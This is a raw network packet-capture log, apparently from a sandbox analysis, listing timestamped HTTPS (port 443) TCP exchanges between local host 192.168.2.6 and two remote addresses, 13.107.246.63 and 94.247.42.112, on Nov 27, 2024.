                                                  Nov 27, 2024 18:09:59.370043039 CET49793443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.370079994 CET4434979313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.370158911 CET49793443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.372636080 CET49794443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.372672081 CET4434979413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.372747898 CET49794443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.372844934 CET49793443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.372858047 CET4434979313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.373613119 CET49795443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.373630047 CET4434979513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.373701096 CET49795443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.375073910 CET49795443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.375089884 CET4434979513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.375318050 CET49794443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.375329971 CET4434979413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.376243114 CET49796443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.376275063 CET4434979694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.376324892 CET49796443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.376751900 CET49797443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.376784086 CET4434979794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.377077103 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.377096891 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.377155066 CET49797443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.377156973 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.378578901 CET49796443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.378603935 CET4434979694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.378978968 CET49797443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.378992081 CET4434979794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.380124092 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.380135059 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.409648895 CET4434978613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.409715891 CET4434978613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.409809113 CET49786443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.410029888 CET49786443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.410041094 CET4434978613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.410053015 CET49786443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.410058022 CET4434978613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.412769079 CET49799443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.412790060 CET4434979913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.412862062 CET49799443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.413044930 CET49799443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.413058043 CET4434979913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.446013927 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.446043968 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.446124077 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.446156979 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.446177006 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.446657896 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.466175079 CET4434978713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.466264009 CET4434978713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.466423035 CET49787443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.466445923 CET49787443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.466463089 CET4434978713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.466471910 CET49787443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.466479063 CET4434978713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.469223976 CET49800443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.469269991 CET4434980013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.469346046 CET49800443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.469504118 CET49800443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.469517946 CET4434980013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.471146107 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.471165895 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.471224070 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.471254110 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.471272945 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.471302986 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.488394022 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.488429070 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.488462925 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.488526106 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.488554001 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.488986969 CET49782443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:59.489012957 CET4434978294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:59.489697933 CET49801443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.489737988 CET4434980113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.489808083 CET49801443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.490020990 CET49801443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.490034103 CET4434980113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.895587921 CET4434977113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.895733118 CET4434977113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:59.895787954 CET49771443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.896327019 CET49771443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:59.896347046 CET4434977113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:00.843846083 CET4434979694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:00.844158888 CET49796443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:00.844177961 CET4434979694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:00.845221996 CET4434979694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:00.845292091 CET49796443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:00.845714092 CET49796443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:00.845777988 CET4434979694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:00.845902920 CET49796443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:00.845913887 CET4434979694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:00.852067947 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:00.852447033 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:00.852454901 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:00.853497982 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:00.853559017 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:00.853851080 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:00.853912115 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:00.854011059 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:00.854017973 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:00.883131981 CET4434979794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:00.883409023 CET49797443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:00.883424997 CET4434979794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:00.883790016 CET4434979794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:00.884263992 CET49797443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:00.884345055 CET4434979794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:00.884437084 CET49797443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:00.884474039 CET4434979794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:00.888593912 CET49796443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:00.900017023 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.054544926 CET4434978813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.055129051 CET49788443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.055145025 CET4434978813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.055728912 CET49788443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.055737972 CET4434978813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.247889996 CET4434979213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.248570919 CET49792443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.248610020 CET4434979213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.249068022 CET49792443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.249080896 CET4434979213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.250551939 CET4434979013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.250858068 CET49790443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.250874043 CET4434979013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.251230001 CET4434979013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.251548052 CET49790443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.251605034 CET4434979013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.251718044 CET49790443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.251739979 CET49790443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.251744986 CET4434979013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.262932062 CET4434979513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.263294935 CET49795443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.263329029 CET4434979513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.264399052 CET4434979513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.264478922 CET49795443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.264803886 CET49795443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.264867067 CET4434979513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.264930964 CET49795443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.264938116 CET4434979513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.264961004 CET49795443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.278630972 CET4434979113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.278781891 CET4434978913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.279030085 CET49789443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.279042006 CET4434978913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.279248953 CET49791443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.279262066 CET4434979113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.279441118 CET4434978913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.279723883 CET49791443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.279727936 CET4434979113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.279791117 CET49789443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.279877901 CET4434978913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.279949903 CET49789443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.279978037 CET49789443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.279980898 CET4434978913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.305474997 CET49795443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.305501938 CET4434979513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.325026035 CET4434980013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.325583935 CET49800443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.325612068 CET4434980013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.326067924 CET49800443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.326075077 CET4434980013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.335614920 CET4434980113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.338072062 CET4434979913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.345027924 CET49799443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.345048904 CET4434979913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.345890045 CET49799443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.345895052 CET4434979913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.345931053 CET49801443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.345949888 CET4434980113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.347240925 CET4434980113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.347333908 CET49801443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.348396063 CET49801443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.348469973 CET4434980113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.353818893 CET4434979313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.354223967 CET49793443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.354235888 CET4434979313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.355422020 CET4434979313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.355477095 CET49793443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.356580019 CET49793443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.357871056 CET49793443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.357877016 CET4434979313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.357888937 CET49793443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.357984066 CET4434979413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.358496904 CET49794443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.358515024 CET4434979413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.359466076 CET4434979313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.362127066 CET4434979413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.362190008 CET49794443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.362469912 CET49794443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.362548113 CET4434979413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.363677979 CET49794443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.363687038 CET4434979413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.363711119 CET49794443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.399214983 CET49801443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.399241924 CET4434980113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.399283886 CET49793443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.399305105 CET4434979313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.411336899 CET4434979413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.414618969 CET49794443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.445161104 CET49793443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.445163965 CET49801443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.510730982 CET4434978813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.510804892 CET4434978813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.510874987 CET49788443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.511126995 CET49788443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.511148930 CET4434978813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.511164904 CET49788443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.511171103 CET4434978813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.514432907 CET49803443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.514475107 CET4434980313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.514571905 CET49803443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.514766932 CET49803443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.514776945 CET4434980313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.599864960 CET4434979794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.649488926 CET49797443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.649501085 CET4434979794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.683415890 CET4434979213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.683486938 CET4434979213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.683537960 CET49792443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.684223890 CET49792443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.684238911 CET4434979213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.684251070 CET49792443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.684257030 CET4434979213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.687290907 CET49804443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.687395096 CET4434980413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.687504053 CET49804443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.687696934 CET49804443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.687721014 CET4434980413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.692873955 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.692908049 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.692914963 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.692924976 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.692945957 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.693006992 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.693018913 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.693032026 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.693068981 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.696646929 CET49797443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.741131067 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.741159916 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.741264105 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.741276026 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.741318941 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.743350029 CET4434979694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.743376017 CET4434979694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.743383884 CET4434979694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.743417025 CET4434979694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.743474007 CET4434979694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.743475914 CET49796443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.743486881 CET4434979694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.743495941 CET49796443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.743508101 CET49796443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.743537903 CET49796443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.753022909 CET4434979694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.753103971 CET49796443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.753108025 CET4434979694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.753164053 CET49796443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.753415108 CET49796443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.753434896 CET4434979694.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.761950016 CET4434980013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.762018919 CET4434980013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.762070894 CET49800443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.762319088 CET49800443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.762336016 CET4434980013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.762348890 CET49800443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.762353897 CET4434980013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.765566111 CET49805443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.765611887 CET4434980513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.765686035 CET49805443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.765882015 CET49805443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.765897989 CET4434980513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.783818007 CET4434979913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.783890009 CET4434979913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.783941031 CET49799443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.784279108 CET49799443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.784290075 CET4434979913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.784300089 CET49799443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.784306049 CET4434979913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.787214994 CET49806443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.787343025 CET4434980613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.787457943 CET49806443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.787606001 CET49806443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.787645102 CET4434980613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.791039944 CET4434979113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.791110992 CET4434979113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.791161060 CET49791443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.791320086 CET49791443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.791326046 CET4434979113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.791337013 CET49791443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.791341066 CET4434979113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.796530008 CET49807443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.796562910 CET4434980713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.796643019 CET49807443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.796777964 CET49807443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.796792030 CET4434980713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.842457056 CET4434979313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.842580080 CET4434979313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.842638016 CET49793443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.843015909 CET49793443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.843036890 CET4434979313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.892362118 CET4434979794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.892374039 CET4434979794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.892398119 CET4434979794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.892405987 CET4434979794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.892430067 CET4434979794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.892441034 CET49797443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.892452002 CET4434979794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.892465115 CET4434979794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.892491102 CET49797443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.892529011 CET49797443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.893373966 CET49797443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.893382072 CET4434979794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.896836042 CET49808443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.896866083 CET4434980894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.896964073 CET49808443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.897195101 CET49808443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.897208929 CET4434980894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.898942947 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.898968935 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.899024010 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.899039030 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.899087906 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.906778097 CET4434979513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.906910896 CET4434979513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.906964064 CET49795443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.907175064 CET49795443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:01.907190084 CET4434979513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:01.975241899 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.975264072 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.975436926 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:01.975462914 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:01.975516081 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.032027960 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.032048941 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.032186031 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.032201052 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.032253981 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.077109098 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.077128887 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.077223063 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.077234983 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.077281952 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.113794088 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.113811016 CET4434979894.247.42.112192.168.2.6
